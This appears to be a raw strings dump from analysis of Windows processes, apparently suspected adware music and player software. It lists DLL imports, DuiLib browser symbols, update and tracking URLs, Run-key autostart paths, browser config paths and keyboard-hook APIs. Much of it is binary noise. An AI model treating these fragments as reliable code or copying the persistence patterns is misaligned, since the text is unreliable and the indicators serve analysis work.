?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?NavigateHomePage@CWebBrowserUI@DuiLib@@QAEXXZ
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?GetExternal@CWebBrowserUI@DuiLib@@UAGJPAPAUIDispatch@@@Z
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
?CommandStateChange@CWebBrowserUI@DuiLib@@IAEXJF@Z
?NewWindow3@CWebBrowserUI@DuiLib@@IAEXPAPAUIDispatch@@AAPAFKPA_W2@Z
?NavigateComplete2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@@Z
?NavigateError@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@11AAPAF@Z
?BeforeNavigate2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@1111AAPAF@Z
?SetAttribute@CWebBrowserUI@DuiLib@@MAEXPBD0@Z
?ReleaseControl@CWebBrowserUI@DuiLib@@MAEXXZ
?DoCreateControl@CWebBrowserUI@DuiLib@@UAE_NXZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@XZ
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z
?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ
DuiLib.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
SHLWAPI.dll
PSAPI.DLL
IPHLPAPI.DLL
NETAPI32.dll
GetCPInfo
GetProcessHeap
OLEAUT32.dll
zcÁ
.?AVAdWebEventListener@@
.?AVCWebBrowserUI@DuiLib@@
.?AVAdWebBrowser@@
.?AVFBWebBrowser@@
.?AVFBWebCall@@
.?AVPlayWebBrowser@@
.?AVCWebBrowserEventHandler@DuiLib@@
.?AV?$TTimer@VEkanWebEvent@@@@
.?AVEkanWebEvent@@
.?AVEkanWebBrowser@@
.?AVEKanWebCall@@
.?AVWebToolBar@@
%Program Files%\wjplay2\20140507132818\wjplay.exe
6$666?6\6
7 7$7(7=8
88S8w8
; ;$;(;,;0;4;8;<;@;
>$?@?`?|?
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
2.14.3.29
ZQPlayer.rc

WJSpeed.exe_2788:

.idata
.rdata
P.XW80
`.rsrc
P.XW81
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
OnKeyDown
OnKeyPress
OnKeyUp
UrlMon
Proportional
OnProgressHQC
Uhs%C
UhE%C
%s%s%s%s%s%s%s%s%s%s
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys,|D
AutoHotkeyst|D
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowStateX~D
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
%s, ClassID: %s
ole32.dll
olepro32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
TIdTCPConnectionl
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError8PG
EIdOSSLLoadingKeyError
Uh.sG
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnHeadersAvailable
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
grfKeyState
TComTargetExecEvent
CmdGroup
nCmdID
nCmdexecopt
hhctrl.ocx
URLMON.DLL
SHDOCLC.DLL
IWebBrowser
IWebBrowserApp
IWebBrowser2
TEWBWindowSetResizable
TEWBWindowSetLeft
TEWBWindowSetTop
TEWBWindowSetWidth
TEWBWindowSetHeight
bstrUrlContext
bstrUrl
OnWindowSetResizable
OnWindowSetLeftP
OnWindowSetTop
OnWindowSetWidth
OnWindowSetHeight
rcmDefault
rcmDebug
DontExecuteScripts
DontExecuteJava
DontExecuteActiveX
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
PMsg
pguidCmdGroup
TTranslateUrlEvent
pchURLIn
ppchURLOut
CmdID
pszUrl
pszUrlContext
szPassWord
ErrorUrl
OptionKeyPath
OverrideOptionKeyPath
OnTranslateUrl
OnCommandExecD
'%s' is not supported.
WebocPopupManagement
ValidateNavigateUrl
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
XmlHttp
MAPI32.DLL
ftp://
http://
https://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
\ieframe.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TKeyEventEx
Bypass
poPortrait
OnKeyDownx
0.750000
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB http://bsalsa.com/
OnActionExecute(QD
SysConfig.ini
WJHTTP
WJPlay.exe
%d.%d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0123456789
DSound.dll
Winmm.dll
Data\User2.ini
88888888
00000000
/DM8/DMSet.Xml
DMSet.Xml
http://www.baidu.com
http://update.wuji.com
8888-88-88
PlayerUpdate.exe
0000-00-00
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
?456789:;<=
!"#$%&'()*+,-./0123
%fMR=N
.sO%e
ah.Se.Sm
e{.gS
_%2.EC
W<.vV
AKLRUXZZjjjjjjjjmjjZZXURLK"
%S_dikkggggk
%Uagkk`F9?nA>H^
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
eEWB.IEConst
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
PrintOptions.HTMLHeader.Strings
PrintOptions.Orientation
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
shell32.dll
GetKeyboardState
SetViewportOrgEx
EnumWindows
advapi32.dll
iphlpapi.dll
EnumThreadWindows
gdi32.dll
 %s6)/
%Se=\aO
U^.Ak
rÜc
.NIHrA
).hv^
:.nCX
!.iU 
wf.Xd
.CD|f
user32.dll
RegDeleteKeyA
RegEnumKeyExA
DeleteUrlCacheEntry
UnhookWindowsHookEx
.esVhr
6.Sz}
version.dll
InternetOpenUrlA
MapVirtualKeyA
GetKeyboardLayoutList
.JdMw
GetKeyState
The ordinal %u could not be located in the dynamic link library %s
GetKeyNameTextA
RegOpenKeyExA
GetWindowsDirectoryA
SetWindowsHookExA
RegCreateKeyExA
N|.xe
c&#%sW
0.TYh?
rzQ.hq
.NlNm
xN%Fp7
}1u.UTpY}9
.CoJX=
u.WZqh
,V^.jp
.vpsD
)@3%s
0\.YNm
n.GZw
%cx$Q
R%c)n
SHFileOperationA
GetKeyboardType
GetCPInfo
RegQueryInfoKeyA
RegFlushKey
ShellExecuteA
A-i}1
ActivateKeyboardLayout
wininet.dll
LoadKeyboardLayoutA
The procedure entry point %s could not be located in the dynamic link library %s
GetKeyboardLayout
RegCloseKey
MsgWaitForMultipleObjects
errorUrl
1.0.0.0
JPEG error #%d
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
No help keyword specified.
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to create key %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

WJSpeed.exe_2788_rwx_00564000_00001000:

.CD|f

WJSpeed.exe_2788_rwx_00567000_00001000:

user32.dll
RegDeleteKeyA
RegEnumKeyExA

WJSpeed.exe_2788_rwx_0057C000_00002000:

RegOpenKeyExA
ole32.dll
GetWindowsDirectoryA

YYMusic2.exe_3844:

.text
`.rdata
@.data
.rsrc
@.reloc
PSShT
t.HuZ
xSSSh
FTPjKS
FtPj;S
C.PjRV
GetProcessWindowStation
portuguese-brazilian
operator
windows936
windows932
windows874
windows1257
windows1256
windows1255
windows1254
windows1253
windows1252
windows1251
windows1250
Invalid or unsupported charset:
Visual C++ CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
AutoRunTipFrame.xml
FrmColor.xml
\SysConfig.ini
FrmConfig.xml
Data\dh.ini
ShowHideWindowKey
ExitWindowKey
tab_hotkey
Software\Microsoft\Windows\CurrentVersion\Run
BoxNews.exe
"%s%s" -mini
"%s" -mini
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s\%s
favorfm.xml
channels.xml
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/ptree_implementation.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/xml_parser.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_read_rapidxml.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_write.hpp
D:\zhuyicheng\boost_1_53_0\boost/property_tree/string_path.hpp
FrmFeedBack.xml
http://tongji.yinyue.fm/feedback/b.html
Data/setup.ini
FrmHotKeyTip.xml
HotKeyTipFrame
hotkey
d:d:d
FrmLrcChild.xml
FrmLrc.xml
Source Files\LrcFrame.cpp
BtnLogin
YYMusic2.exe
http://www.hao123.com/?tn=98868055_hao_pg
http://update.yinyue.fm/goUrl.html?
Skin.rs
Skin\mainframeshadow.png
http://update.yinyue.fm/tj.ashx
Skin\progresstooltip.png
__HotKeyTipWindow
__HotKeyTipClass
Skin\hotkeytipbk.png
adb.exe
aapt.exe
apnews.exe
FrmPlayer.xml
60,8,100,118
60,24,100,134
Source Files\MainFrame.cpp
file='suspensiontopa.png'
file='suspensiontop.png'
file='suspensiontopahover.png'
file='btn-play.png' source='0,0,64,64'
file='btn-play.png' source='0,64,64,128'
file='btn-play.png' source='0,128,64,192'
file='lyrictoplay.png'
pl_play.png
file='btn-pause.png' source='0,0,64,64'
file='btn-pause.png' source='0,64,64,128'
file='btn-pause.png' source='0,128,64,192'
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
pl_pause.png
file='loading0%d.png'
-d:d:d
-d:d
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
file='bk.png'
lyriclikea2.png
lyriclike.png
lyriclikea.png
MessageBox.xml
Source Files\MusicPlayer.cpp
http://update.yinyue.fm/
<4,$?7/'
(3-!0,1'8"5.*2$
Data\server.ini
Data\Version.ini
appupdate/ver.txt
PlayerUpdate.exe
FrmPlayList.xml
FrmPopWnd.xml
WebBrowserEx
http://update.yinyue.fm/url.txt
FrmProgressToolTip.xml
%d:d
http://tongji.yinyue.fm/
a.ashx
00:00:00:00:00:00
%d-%d-%d %d:%d:%d
icon/ccjs.ico
icon/ie.ico
Internet Explorer YyfmPlay.lnk
icon\gouwu.ico
http://update.yinyue.fm//dh.txt
icon\ccjs.ico
icon\ie.ico
X:X:X:X:X:X
//./%s
Data/version.ini
2000-01-01
2000-01-01 00:00:00
Data/client.ini
Data/dh.ini
Software\Microsoft\Windows NT\CurrentVersion
Data/user2.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe
\TheWorld.ini
\Baidu\browser\config.ini
\SogouExplorer\config.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Maxthon2
SharedAccount\Config\Config.ini
SetTipFrame.xml
FrmSetWindowLrcFrame.xml
Source Files\SetWindowLrcFrame.cpp
FrmSystemMenuFrame.xml
event_edit_keydown_eshowhide
event_edit_keydown_eexit
file='list_play.png' dest='6,6,24,24'
file='list_pause.png' dest='6,6,24,24'
2-0-0|1-0-0
1-0-0|1-0-0
3-0-0|1-0-0
4-0-0|1-0-0
5-0-0|1-0-0
6-0-0|1-0-0
list_item.xml
operation
frmWindowLrc.xml
frmWindowLrcParent.xml
http://www.9ku.com/lrc2/
http://www.9ku.com/fm/
http://img.9ku.com
http://mp3.9ku.com
D:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/json_parser_read.hpp
http://player.kuwo.cn/webmusic/st/getMuiseDate?flag=3&r=&pd=
http://fm.baidu.com/dev/api/?tn=playlist&id=
http://music.baidu.com/data/music/fmlink?type=mp3&rate=320&songIds=
http://fm.baidu.com
http://pan.baidu.com
http://live.hkuradio.com/radio2?download=1
http://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_yy.png
http://live.hkuradio.com/radio1?download=1
http://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_zh.png
http://live.3gv.ifeng.com/live/zhongwen?fmt=mp3_32k_mp3
http://imgs.diantai.ifeng.com/images/channelimg/ifeng_zwt_new.png
http://live.3gv.ifeng.com/live/zixun?fmt=mp3_32k_mp3
http://imgs.diantai.ifeng.com/images/channelimg/ifeng_zxt_new.png
http://live.3gv.ifeng.com/live/hongkong?fmt=mp3_32k_mp3
http://imgs.diantai.ifeng.com/images/channelimg/ifeng_xgt_new.png
http://moblive.rbc.cn/fm876.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_wy_new.png
http://moblive.rbc.cn/fm1039.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgjt_new.png
http://moblive.rbc.cn/fm1006.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_xw_new.png
http://moblive.rbc.cn/am603.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bggs_new.png
http://moblive.rbc.cn/fm1025.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgty_new.png
http://moblive.rbc.cn/am774.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgwy_new.png
http://moblive.rbc.cn/am927.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgaj_new.png
http://moblive.rbc.cn/fm1073.mp3
http://imgs.diantai.ifeng.com/images/channelimg/bg_bgcsfw_new.png
http://www.xiami.com/radio/play/type/6/oid/0
libfm::fm_douban_impl::login
http://www.douban.com/j/app/login
&password=
http://www.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&user_id=
http://www.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&type=
http://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?out=json&value=
"msg":
_0.jpg
http://imgcache.qq.com/music/photo/album/
http://music.qq.com/miniportal/static/lyric/
libfm::fm_impl::get_song_url
WinExec
KERNEL32.dll
GetAsyncKeyState
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
avcore.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
SHLWAPI.dll
gdiplus.dll
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@XZ
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
DuiLib.dll
PSAPI.DLL
IPHLPAPI.DLL
NETAPI32.dll
GetCPInfo
GetProcessHeap
zcÁ
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyTipFrameWnd@@
.?AVCWebBrowserUIEx@@
.?AVWebBrowserEventSinker@@
.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$alternative@V?$action@V?$chset@D@classic@spirit@boost@@Ua_escape@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@V?$action@U?$uint_parser@K$0BA@$03$03@classic@spirit@boost@@Ua_unicode@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boos